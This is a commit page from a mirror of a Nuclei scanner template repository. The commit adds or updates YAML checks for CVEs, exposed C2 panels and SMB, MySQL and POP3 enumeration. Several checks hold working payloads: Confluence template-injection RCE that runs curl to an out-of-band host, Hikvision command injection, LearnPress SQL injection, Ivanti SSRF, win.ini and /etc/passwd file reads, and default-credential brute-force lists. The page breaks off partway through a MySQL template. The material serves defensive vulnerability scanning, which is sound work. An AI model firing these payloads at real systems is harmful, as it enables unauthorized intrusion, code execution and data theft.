daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Adding new templates from Unreleased Templates Repo

patch-1
[PDBot] 2024-03-09 14:23:42 +00:00
parent 6ce3478592
commit faebc1af6a
32 changed files with 1304 additions and 46 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

37
http/cves/2023/CVE-2023-22527.yaml
View File

@ -1,29 +1,21 @@
id: CVE-2023-22527
info:
name: Atlassian Confluence - Remote Code Execution
name: Atlassian Confluence Unauthenticted Remote Code Execution
author: iamnooob,rootxharsh,pdresearch
severity: critical
description: |
A template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance. Customers using an affected version must take immediate action.
Most recent supported versions of Confluence Data Center and Server are not affected by this vulnerability as it was ultimately mitigated during regular version updates. However, Atlassian recommends that customers take care to install the latest version to protect their instances from non-critical vulnerabilities outlined in Atlassians January Security Bulletin.
description: |-
A template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance. Customers using an affected version must take immediate action. Most recent supported versions of Confluence Data Center and Server are not affected by this vulnerability as it was ultimately mitigated during regular version updates. However, Atlassian recommends that customers take care to install the latest version to protect their instances from non-critical vulnerabilities outlined in Atlassians January Security Bulletin.
reference:
- https://confluence.atlassian.com/pages/viewpage.action?pageId=1333335615
- https://jira.atlassian.com/browse/CONFSERVER-93833
- https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2023-22527
epss-score: 0.00044
epss-percentile: 0.08115
cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: atlassian
product: confluence_data_center
shodan-query: http.component:"Atlassian Confluence"
tags: cve,cve2023,confluence,rce,ssti
epss-percentile: 0.08185
tags: cve,cve2023,confluence
http:
- raw:
@ -31,19 +23,18 @@ http:
POST /template/aui/text-inline.vm HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate, br
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 335
label=aaa\u0027%2b#request.get(\u0027.KEY_velocity.struts2.context\u0027).internalGet(\u0027ognl\u0027).findValue(#parameters.poc[0],{})%2b\u0027&poc=@org.apache.struts2.ServletActionContext@getResponse().setHeader(\u0027x_vuln_check\u0027,(new+freemarker.template.utility.Execute()).exec({"whoami"}))
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=(new freemarker.template.utility.Execute()).exec({"curl {{interactsh-url}}"})
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Empty{name='
- type: dsl
dsl:
- x_vuln_check != "" # check for custom header key exists
- contains(to_lower(body), 'empty{name=')
condition: and
extractors:
- type: dsl
dsl:
- x_vuln_check # prints the output of whoami
# digest: 4b0a00483046022100cad74b2de250961c24ea16a5b8ed5cf9c1b4fa29b81cbfca33f3b72f5a4474c5022100c501f652babe15618734328d07936a3c399f964dfc0a67db2a8a61dd9e20a6ef:922c64590222798bb761d5b6d8e72950
- "contains(interactsh_protocol, 'dns')"

37
http/cves/2023/CVE-2023-6114.yaml Normal file
View File

@ -0,0 +1,37 @@
id: CVE-2023-6114
info:
name: Duplicator < 1.5.7.1; Duplicator Pro < 4.5.14.2 - Unauthenticated Sensitive Data Exposure
author: DhiyaneshDk
severity: high
description: |
The Duplicator WordPress plugin before 1.5.7.1, Duplicator Pro WordPress plugin before 4.5.14.2 does not disallow listing the `backups-dup-lite/tmp` directory (or the `backups-dup-pro/tmp` directory in the Pro version), which temporarily stores files containing sensitive data. When directory listing is enabled in the web server, this allows unauthenticated attackers to discover and access these sensitive files, which include a full database dump and a zip archive of the site.
remediation: Duplicator Fixed in 1.5.7.1,Duplicator-Pro Fixed in 4.5.14.2.
reference:
- https://drive.google.com/file/d/1mpapFCqfZLv__EAM7uivrrl2h55rpi1V/view?usp=sharing
- https://wpscan.com/vulnerability/5c5d41b9-1463-4a9b-862f-e9ee600ef8e1
- https://nvd.nist.gov/vuln/detail/CVE-2023-6114
- https://wpscan.com/plugin/duplicator/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-6114
cwe-id: CWE-552
epss-score: 0.00145
epss-percentile: 0.50326
cpe: cpe:2.3:a:awesomemotive:duplicator:*:*:*:*:-:wordpress:*:*
tags: cve,cve2023,duplicator,duplicator-pro,lfi,wpscan,wordpress,wp-plugin,wp
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/backups-dup-lite/tmp/"
- "{{BaseURL}}/wp-content/backups-dup-pro/tmp/"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains(body, '/tmp') && contains(body, '<title>Index of')"
condition: and

33
http/cves/2023/CVE-2023-6567.yaml Normal file
View File

@ -0,0 +1,33 @@
id: CVE-2023-6567
info:
name: LearnPress <= 4.2.5.7 - SQL Injection
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
The LearnPress plugin for WordPress is vulnerable to time-based SQL Injection via the 'order_by' parameter in all versions up to, and including, 4.2.5.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
remediation: Fixed in version 4.2.5.8
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learnpress/learnpress-4257-unauthenticated-sql-injection-via-order-by
- https://wpscan.com/vulnerability/c5110450-3b4e-4100-8db4-0d7f5d43c12f/
- https://nvd.nist.gov/vuln/detail/CVE-2023-6567
classification:
cve-id: CVE-2023-6567
metadata:
max-request: 1
verified: true
publicwww-query: "/wp-content/plugins/learnpress"
tags: cve,cve2023,wp,wp-plugin,wordpress,learnpress,sqli
http:
- method: GET
path:
- "{{BaseURL}}/wp-json/lp/v1/courses/archive-course?&order_by=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))X)&limit=-1"
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'contains_all(header, "lp_session_guest=", "application/json")'
- 'contains_all(body, "status\":\"success", "No courses were found")'
condition: and

46
http/cves/2023/CVE-2023-6895.yaml
View File

@ -1,24 +1,20 @@
id: CVE-2023-6895
info:
name: Hikvision Intercom Broadcasting System - Command Execution
author: archer
name: Hikvision IP ping.php - Command Execution
author: DhiyaneshDk
severity: critical
description: |
Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE (HIK) version has an operating system command injection vulnerability. The vulnerability originates from the parameter jsondata[ip] in the file /php/ping.php, which can cause operating system command injection.
description: A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK). It has been declared as critical. This vulnerability affects unknown code of the file /php/ping.php. The manipulation of the argument jsondata[ip] with the input netstat -ano leads to os command injection. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. VDB-248254 is the identifier assigned to this vulnerability.
reference:
- https://github.com/FuBoLuSec/CVE-2023-6895/blob/main/CVE-2023-6895.py
- https://vuldb.com/?ctiid.248254
- https://vuldb.com/?id.248254
- https://github.com/Marco-zcl/POC
- https://github.com/d4n-sec/d4n-sec.github.io
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-6895
cwe-id: CWE-78
epss-score: 0.0008
epss-percentile: 0.32716
epss-percentile: 0.33389
cpe: cpe:2.3:o:hikvision:intercom_broadcast_system:*:*:*:*:*:*:*:*
metadata:
verified: true
@ -26,31 +22,35 @@ info:
vendor: hikvision
product: intercom_broadcast_system
fofa-query: icon_hash="-1830859634"
tags: cve,cve2023,rce,hikvision
tags: cve,cve2023,hikvision,rce
http:
- raw:
- |
POST /php/ping.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
- method: POST
path:
- "{{BaseURL}}/php/ping.php"
body: "jsondata%5Btype%5D=99&jsondata%5Bip%5D={{command}}"
headers:
Content-Type: "application/x-www-form-urlencoded"
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ping%20{{interactsh-url}}
payloads:
command:
- 'id'
- 'cmd /c ipconfig'
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: regex
part: body
regex:
- "Windows IP"
- "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
condition: or
- type: word
part: body
part: header
words:
- "TTL="
- "text/html"
- type: status
status:
- 200
# digest: 490a00463044022046e9673fbb222a36f6113e7f32e176bc2d800d2a0f8fb0824bc84dd30705c4fa022051992f8ba2020e9c09b574c69ecbca8b48a5d98fda9f790dd46ba0313ebb08bb:922c64590222798bb761d5b6d8e72950

45
http/cves/2023/CVE-2024-21893.yaml Normal file
View File

@ -0,0 +1,45 @@
id: CVE-2024-21893
info:
name: Ivanti SAML - Server Side Request Forgery (SSRF)
author: DhiyaneshDk
severity: high
description: |
A server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA allows an attacker to access certain restricted resources without authentication.
reference:
- https://attackerkb.com/topics/FGlK1TVnB2/cve-2024-21893/rapid7-analysis
- https://www.assetnote.io/resources/research/ivantis-pulse-connect-secure-auth-bypass-round-two
- https://github.com/advisories/GHSA-5rr9-mqhj-7cr2
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
cvss-score: 8.2
cve-id: CVE-2024-21893
cwe-id: CWE-918
cpe: cpe:2.3:a:ivanti:connect_secure:9.0:-:*:*:*:*:*:*
metadata:
vendor: ivanti
product: connect_secure
shodan-query: "html:\"welcome.cgi?p=logo\""
tags: cve,cve2024,kev,ssrf,ivanti
http:
- raw:
- |
POST /dana-ws/saml20.ws HTTP/1.1
Host: {{Hostname}}
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://{{interactsh-url}}"/> <ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: word
part: body
words:
- '/dana-na/'
- 'WriteCSS'
condition: and

61
http/default-logins/ispconfig-default-login.yaml Normal file
View File

@ -0,0 +1,61 @@
id: ispconfig-default-login
info:
name: ISPConfig - Default Password
author: pussycat0x
severity: high
description: |
ISPConfig Default Password Vulnerability exposes systems to unauthorized access, compromising data integrity and security.
metadata:
verified: true
shodan-query: http.title:"ispconfig"
tags: default-login,ispconfig
http:
- raw:
- |
GET /lgoin HTTP/1.1
Host: {{Hostname}}
- |
POST /login/index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Origin: {{BaseURL}}
Connection: close
Referer: {{RootURL}}/login/
username={{username}}&password={{password}}&s_mod=login&s_pg=index
- |
GET /sites/web_vhost_domain_list.php HTTP/1.1
Host: {{Hostname}}
X-Requested-With: XMLHttpRequest
Referer: {{RootURL}}/index.php
attack: pitchfork
payloads:
username:
- 'admin'
- 'guest'
- 'root'
password:
- 'admin'
- 'password'
- 'toor'
stop-at-first-match: true
host-redirects: true
matchers-condition: and
matchers:
- type: word
part: body_3
words:
- Tools
- Websites
condition: and
- type: status
status:
- 200

33
http/exposed-panels/c2/ares-rat-c2.yaml Normal file
View File

@ -0,0 +1,33 @@
id: ares-rat-c2
info:
name: Area Rat C2 - Detect
author: pussycat0x
severity: info
description: |
Ares is a Python Remote Access Tool.
reference:
- https://github.com/montysecurity/C2-Tracker/blob/main/tracker.py
metadata:
verified: true
max-request: 1
shodan-query: product:'Ares RAT C2'
tags: c2,ir,osint,ares,panel,rat
http:
- method: GET
path:
- '{{BaseURL}}/login'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>Ares</title>'
- 'Passphrase:'
condition: and
- type: status
status:
- 200

32
http/exposed-panels/c2/caldera-c2.yaml Normal file
View File

@ -0,0 +1,32 @@
id: caldera-c2
info:
name: Caldera C2 - Detect
author: pussycat0x
severity: info
description: |
MITRE Caldera™ is a cyber security platform designed to easily automate adversary emulation, assist manual red-teams, and automate incident response.
reference:
- https://github.com/mitre/caldera
- https://github.com/montysecurity/C2-Tracker/blob/main/tracker.py
metadata:
verified: true
max-request: 1
fofa-query: http.favicon.hash:-636718605
tags: c2,ir,osint,caldera,panel
http:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>Login | CALDERA</title>'
- type: status
status:
- 200

31
http/exposed-panels/c2/hack5-cloud-c2.yaml Normal file
View File

@ -0,0 +1,31 @@
id: hack5-cloud-c2
info:
name: Hack5 Cloud C2 - Detect
author: pussycat0x
severity: info
description: |
Cloud C² is a self-hosted web-based command and control suite for networked Hak5 gear that lets you pentest from anywhere. Linux, Mac and Windows computers can host the Cloud C² server while Hak5 gear such as the WiFi Pineapple, LAN Turtle and Packet Squirrel can be provisioned as clients.
reference:
- https://twitter.com/fofabot/status/1742737671037091854
metadata:
verified: true
max-request: 1
fofa-query: app="Hak5-C2"
tags: c2,ir,osint,hack5c2,panel
http:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>Hak5 Cloud C²</title>'
- type: status
status:
- 200

32
http/exposed-panels/c2/pupyc2.yaml Normal file
View File

@ -0,0 +1,32 @@
id: pupyc2
info:
name: PupyC2 - Detect
author: pussycat0x
severity: info
description: |
Pupy is a cross-platform, multi function RAT and post-exploitation tool mainly written in python. It features an all-in-memory execution guideline and leaves a very low footprint. Pupy can communicate using multiple transports, migrate into processes using reflective injection, and load remote python code, python packages and python C-extensions from memory.
reference:
- https://twitter.com/TLP_R3D/status/1654038602282565632
- https://github.com/n1nj4sec/pupy
metadata:
verified: true
max-request: 1
shodan-query: aa3939fc357723135870d5036b12a67097b03309
tags: c2,ir,osint,pupyc2,panel
http:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
part: header
words:
- 'Etag: "aa3939fc357723135870d5036b12a67097b03309"'
- type: status
status:
- 200

33
http/exposed-panels/c2/supershell-c2.yaml Normal file
View File

@ -0,0 +1,33 @@
id: supershell-c2
info:
name: Supershell C2 - Detect
author: pussycat0x
severity: info
description: |
Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel, a fully interactive shell can be obtained, and it supports multi-platform architecture Payload.
reference:
- https://twitter.com/S4nsLimit3/status/1693619836339859497
- https://github.com/tdragon6/Supershell/blob/main/README_EN.md
metadata:
verified: true
max-request: 1
fofa-query: icon_hash="-1010228102"
tags: c2,ir,osint,supershell,panel
http:
- method: GET
path:
- '{{BaseURL}}'
host-redirects: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>Supershell - 登录</title>'
- type: status
status:
- 200

36
http/vulnerabilities/esafenet/esafenet-mysql-fileread.yaml Normal file
View File

@ -0,0 +1,36 @@
id: esafenet-mysql-fileread
info:
name: Esafenet CDG mysql - File Read
author: DhiyaneshDk
severity: high
description: |
CDGServer3 Unauthorized File Download vulnerability is detected.
metadata:
verified: true
max-request: 1
fofa-query: title="电子文档安全管理系统"
tags: esafenet,lfi,mysql
http:
- method: GET
path:
- "{{BaseURL}}/CDGServer3/SQL/MYSQL/create_SmartSec_mysql.sql"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "varchar"
- "create table"
condition: and
- type: word
part: header
words:
- "application/x-sql"
- type: status
status:
- 200

30
http/vulnerabilities/idoc/idocview-2word-fileupload.yaml Normal file
View File

@ -0,0 +1,30 @@
id: idocview-2word-fileupload
info:
name: IDoc View /html/2word - Arbitrary File Upload
author: DhiyaneshDK
severity: high
metadata:
verified: true
max-request: 1
fofa-query: title=="在线文档预览 - I Doc View"
tags: idoc,rce,instrusive,file-upload
variables:
file: "{{to_lower(rand_text_alpha(5))}}"
http:
- method: GET
path:
- "{{BaseURL}}/html/2word?url={{file}}"
matchers-condition: and
matchers:
- type: word
part: response
words:
- "{{md5(file)}}.docx"
- type: status
status:
- 200

37
http/vulnerabilities/idoc/idocview-lfi.yaml Normal file
View File

@ -0,0 +1,37 @@
id: idocview-lfi
info:
name: IDoc View - Arbitrary File Read
author: DhiyaneshDK
severity: high
metadata:
verified: true
max-request: 1
fofa-query: title=="在线文档预览 - I Doc View"
tags: idoc,lfi,file-read
variables:
file: "{{to_lower(rand_text_alpha(5))}}"
http:
- method: GET
path:
- "{{BaseURL}}/doc/upload?token=testtoken&url=file:///C:/windows/win.ini&name={{file}}.txt"
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(content_type, 'application/json')
- contains_all(body, "ext", "srcUrl", "success", "md5")
condition: and
extractors:
- type: regex
part: body
internal: true
name: filepath
group: 1
regex:
- '"srcUrl":"\/([a-z/0-9_.]+)"'

36
http/vulnerabilities/other/office365-indexs-fileread.yaml Normal file
View File

@ -0,0 +1,36 @@
id: office365-indexs-fileread
info:
name: OfficeWeb365 Indexs Interface - Arbitary File Read
author: DhiyaneshDK
severity: high
description: |
There is any file reading in the officeWeb365 Indexs interface.
reference:
- https://github.com/wy876/POC/blob/main/OfficeWeb365_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
metadata:
verified: true
max-request: 1
shodan-query: "OfficeWeb365"
tags: officeweb365,lfi
http:
- method: GET
path:
- "{{BaseURL}}/Pic/Indexs?imgs=DJwkiEm6KXJZ7aEiGyN4Cz83Kn1PLaKA09"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "for 16-bit app support"
- type: word
part: body
words:
- "image/png"
- type: status
status:
- 200

51
javascript/audit/mysql/mysql-load-file.yaml Normal file
View File

@ -0,0 +1,51 @@
id: mysql-load-file
info:
name: MySQL LOAD_FILE - Enable
author: pussycat0x
severity: high
description: |
The LOAD_FILE function in MySQL is potentially dangerous if not used carefully, as it can pose security risks. The function is designed to read the contents of a file on the server and return the file contents as a string. However, it can be exploited if not properly restricted or sanitized, leading to security vulnerabilities.
reference:
- https://nmap.org/nsedoc/scripts/mysql-databases.html
metadata:
shodan-query: port:3306
verified: true
tags: js,mysql,network,audit,fuzz
javascript:
- code: |
let m = require('nuclei/mysql');
let c = m.MySQLClient();
let response = c.ExecuteQuery(Host,Port,User,Pass,Query);
to_json(response);
args:
Host: "{{Host}}"
Port: "3306"
Query: SELECT LOAD_FILE('/etc/passwd')
User: "{{usernames}}"
Pass: "{{passwords}}"
threads: 10
attack: pitchfork
payloads:
usernames: helpers/wordlists/mysql-users.txt
passwords: helpers/wordlists/mysql-passwords.txt
stop-at-first-match: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- success == true
- type: word
words:
- "root:x:"
extractors:
- type: json
part: response
json:
- .Rows[]

40
javascript/enumeration/smb/pop3/pop3-capabilities-enum.yaml Normal file
View File

@ -0,0 +1,40 @@
id: pop3-capabilities-enum
info:
name: POP3 Capabilities - Enumeration
author: pussycat0x
severity: info
description: |
POP3 capabilities are defined in RFC 2449. The CAPA command allows a client to ask a server what commands it supports and possibly any site-specific policy. Besides the list of supported commands, the IMPLEMENTATION string giving the server version may be available.
reference:
- https://nmap.org/nsedoc/scripts/pop3-capabilities.html
metadata:
max-request: 1
shodan-query: "port:110"
verified: true
tags: js,network,pop3,enum
javascript:
- code: |
let data = "CAPA\r\n"
let c = require("nuclei/net");
let conn = c.Open('tcp', `${Host}:${Port}`);
conn.Send(data);
let result = conn.RecvString();
let cleanedData = result.replace(/\+OK Dovecot ready\.\r\n\+OK|\r\n|\s/g, " ");
Export(cleanedData)
args:
Host: "{{Host}}"
Port: 110
matchers:
- type: dsl
dsl:
- "success == true"
extractors:
- type: dsl
name:
dsl:
- response

29
javascript/enumeration/smb/rsync/rsync-version.yaml Normal file
View File

@ -0,0 +1,29 @@
id: rsync-version
info:
name: Rsync Version - Detect
author: DhiyaneshDK
severity: info
description: |
Identify the Version of the Rsync Protocol
metadata:
verified: true
max-request: 1
shodan-query: port:"873"
tags: js,network,rsync,enum
javascript:
- code: |
let m = require('nuclei/rsync');
let c = m.RsyncClient();
let response = c.IsRsync(Host,Port);
to_json(response);
args:
Host: "{{Host}}"
Port: "873"
extractors:
- type: json
json:
- .Banner

46
javascript/enumeration/smb/smb-default-creds.yaml Normal file
View File

@ -0,0 +1,46 @@
id: smb-default-creds
info:
name: SMB Default Credential - Brutforcing
author: pussycat0x
severity: high
description: |
Attempts to guess username/password combinations over SMB.
reference:
- https://nmap.org/nsedoc/scripts/smb-brute.html
metadata:
verified: true
shodan-query: "port:445"
tags: js,network,smb,enum,default
javascript:
- code: |
var m = require("nuclei/smb");
var c = m.SMBClient();
var response = c.ListShares(Host, Port, User, Pass);
response;
args:
Host: "{{Host}}"
Port: "445"
User: "{{usernames}}"
Pass: "{{passwords}}"
attack: clusterbomb
payloads:
usernames:
- 'admin'
- 'administrator'
- 'guest'
passwords:
- 'admin'
- 'password'
- 'guest'
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'response != "[]"'
- 'success == true'
condition: and

41
javascript/enumeration/smb/smb-enum-domains.yaml Normal file
View File

@ -0,0 +1,41 @@
id: smb-enum-domains
info:
name: SMB - Enum Domains
author: DhiyaneshDK
severity: info
description: |
SMB enumeration of domains is often part of the reconnaissance phase, where security professionals or attackers attempt to gather information about the target network to identify potential vulnerabilities.
reference:
- https://nmap.org/nsedoc/scripts/smb-enum-domains.html
metadata:
verified: true
max-request: 1
shodan-query: port:445
tags: js,network,smb,enum
javascript:
- code: |
var m = require("nuclei/smb");
var c = m.SMBClient();
var response = c.ListSMBv2Metadata(Host, Port);
to_json(response);
args:
Host: "{{Host}}"
Port: "445"
matchers:
- type: dsl
dsl:
- "len(DNSDomainName) != 0"
extractors:
- type: json
internal: true
name: DNSDomainName
json:
- '.DNSDomainName'
- type: json
json:
- '"DomainName: "+ .DNSDomainName '

158
javascript/enumeration/smb/smb-os-detect.yaml Normal file
View File

@ -0,0 +1,158 @@
id: smb-os-detect
info:
name: SMB Operating System - Detect
author: pussycat0x
severity: info
description: |
Detect Operating System
reference:
- https://nmap.org/nsedoc/scripts/smb-os-discovery.html
metadata:
shodan-query: "port:445"
tags: js,network,smb,enum,os
javascript:
- code: |
var m = require("nuclei/smb");
var c = m.SMBClient();
var response = c.ListSMBv2Metadata(Host, Port);
if (response.OSVersion === "6.3.9600") {
osInfo = "Windows 8.1";
} else if (response.OSVersion === "3.10.511") {
osInfo = "Windows NT 3.1";
} else if (response.OSVersion === "3.50.807") {
osInfo = "Windows NT 3.5";
} else if (response.OSVersion === "3.10.528") {
osInfo = "Windows NT 3.1, Service Pack 3";
} else if (response.OSVersion === "3.51.1057") {
osInfo = "Windows NT 3.51";
} else if (response.OSVersion === "4.00.950") {
osInfo = "Windows 95";
} else if (response.OSVersion === "4.00.950A") {
osInfo = "Windows 95 OEM Service Release 1";
} else if (response.OSVersion === "4.00.950B") {
osInfo = "Windows 95 OEM Service Release 2";
} else if (response.OSVersion === "4.0.1381") {
osInfo = "Windows NT 4.0";
} else if (response.OSVersion === "4.00.950B") {
osInfo = "Windows 95 OEM Service Release 2.1";
} else if (response.OSVersion === "4.00.950C") {
osInfo = "OEM Service Release 2.5";
} else if (response.OSVersion === "4.10.1998") {
osInfo = "Windows 98";
} else if (response.OSVersion === "4.10.2222") {
osInfo = "Windows 98 Second Edition (SE)";
} else if (response.OSVersion === "5.0.2195") {
osInfo = "Windows 2000";
} else if (response.OSVersion === "4.90.3000") {
osInfo = "Windows Me";
} else if (response.OSVersion === "5.1.2600") {
osInfo = "Windows XP";
} else if (response.OSVersion === "5.1.2600.1105-1106") {
osInfo = "Windows XP, Service Pack 1";
} else if (response.OSVersion === "5.2.3790") {
osInfo = "Windows Server 2003";
} else if (response.OSVersion === "5.1.2600.2180") {
osInfo = "Windows XP, Service Pack 2";
} else if (response.OSVersion === "5.2.3790.1180") {
osInfo = "Windows Server 2003, Service Pack 1";
} else if (response.OSVersion === "5.2.3790") {
osInfo = "Windows Server 2003 R2";
} else if (response.OSVersion === "6.0.6000") {
osInfo = "Windows Vista";
} else if (response.OSVersion === "5.2.3790") {
osInfo = "Windows Server 2003, Service Pack 2";
} else if (response.OSVersion === "5.2.4500") {
osInfo = "Windows Home Server";
} else if (response.OSVersion === "6.0.6001") {
osInfo = "Windows Vista, Service Pack 1";
} else if (response.OSVersion === "6.0.6001") {
osInfo = "Windows Server 2008";
} else if (response.OSVersion === "5.1.2600") {
osInfo = "Windows XP, Service Pack 3";
} else if (response.OSVersion === "6.0.6002") {
osInfo = "Windows Vista, Service Pack 2";
} else if (response.OSVersion === "6.0.6002") {
osInfo = "Windows Server 2008, Service Pack 2";
} else if (response.OSVersion === "6.1.7600") {
osInfo = "Windows 7";
} else if (response.OSVersion === "6.1.7600") {
osInfo = "Windows Server 2008 R2";
} else if (response.OSVersion === "6.1.7601") {
osInfo = "Windows 7, Service Pack 1";
} else if (response.OSVersion === "6.1.7601") {
osInfo = "Windows Server 2008 R2, Service Pack ";
} else if (response.OSVersion === "6.1.8400") {
osInfo = "Windows Home Server 2011";
} else if (response.OSVersion === "6.2.9200") {
osInfo = "Windows Server 2012";
} else if (response.OSVersion === "6.2.9200") {
osInfo = "Windows 8";
} else if (response.OSVersion === "6.3.9600") {
osInfo = "Windows 8.1";
} else if (response.OSVersion === "6.3.9600") {
osInfo = "Windows Server 2012 R2";
} else if (response.OSVersion === "10.0.10240") {
osInfo = "Windows 10, Version 1507";
} else if (response.OSVersion === "10.0.10586") {
osInfo = "Windows 10, Version 1511";
} else if (response.OSVersion === "10.0.14393") {
osInfo = "Windows 10, Version 1607";
} else if (response.OSVersion === "10.0.14393") {
osInfo = "Windows Server 2016, Version 1607";
} else if (response.OSVersion === "10.0.15063") {
osInfo = "Windows 10, Version 1703";
} else if (response.OSVersion === "10.0.16299") {
osInfo = "Windows 10, Version 1709";
} else if (response.OSVersion === "10.0.17134") {
osInfo = "Windows 10, Version 1803";
} else if (response.OSVersion === "10.0.17763") {
osInfo = "Windows Server 2019, Version 1809";
} else if (response.OSVersion === "10.0.17763") {
osInfo = "Windows 10, Version 1809";
} else if (response.OSVersion === "6.0.6003") {
osInfo = "Windows Server 2008, Service Pack 2, Rollup KB4489887";
} else if (response.OSVersion === "10.0.18362") {
osInfo = "Windows 10, Version 1903";
} else if (response.OSVersion === "10.0.18363") {
osInfo = "Windows 10, Version 1909";
} else if (response.OSVersion === "10.0.18363") {
osInfo = "Windows Server, Version 1909";
} else if (response.OSVersion === "10.0.19041") {
osInfo = "Windows 10, Version 2004";
} else if (response.OSVersion === "10.0.19041") {
osInfo = "Windows Server, Version 2004";
} else if (response.OSVersion === "10.0.19042") {
osInfo = "Windows 10, Version 20H2";
} else if (response.OSVersion === "10.0.19042") {
osInfo = "Windows Server, Version 20H2";
} else if (response.OSVersion === "10.0.19043") {
osInfo = "Windows 10, Version 21H1";
} else if (response.OSVersion === "10.0.20348") {
osInfo = "Windows Server 2022, Version 21H2";
} else if (response.OSVersion === "10.0.22000") {
osInfo = "Windows 11, Version 21H2";
} else if (response.OSVersion === "10.0.19044") {
osInfo = "Windows 10, Version 21H2";
} else if (response.OSVersion === "10.0.22621") {
osInfo = "Windows 11, Version 22H2";
} else if (response.OSVersion === "10.0.19045") {
osInfo = "Windows 10, Version 22H2";
} else if (response.OSVersion === "10.0.25398") {
osInfo = "Windows Server, Version 23H2";
} else if (response.OSVersion === "10.0.22631") {
osInfo = "Windows 11, Version 23H2";
} else if (response.OSVersion !== "0") {
osInfo = response.OSVersion;
}
osInfo;
args:
Host: "{{Host}}"
Port: "445"
extractors:
- type: dsl
dsl:
- response

28
javascript/enumeration/smb/smb-version-detect.yaml Normal file
View File

@ -0,0 +1,28 @@
id: smb-version-detect
info:
name: SMB Version - Detection
author: pussycat0x
severity: info
description: |
SMB version detection involves identifying the specific Server Message Block protocol version used by a system or network. This process is crucial for ensuring compatibility and security, as different SMB versions may have distinct features and vulnerabilities.
metadata:
shodan-query: "port:445"
tags: js,network,smb,enum
javascript:
- code: |
let m = require("nuclei/smb");
let c = m.SMBClient();
let response = c.ConnectSMBInfoMode(Host, Port);
to_json(response);
args:
Host: "{{Host}}"
Port: "445"
extractors:
- type: json
name: smb-version
json:
- '.Version.VerString'

44
javascript/mysql/mysql-db-enum.yaml Normal file
View File

@ -0,0 +1,44 @@
id: mysql-db-enum
info:
name: MySQL Database - Enumeration
author: pussycat0x
severity: high
metadata:
shodan-query: port:3306
tags: js,mssql,network,enum,fuzz
javascript:
- code: |
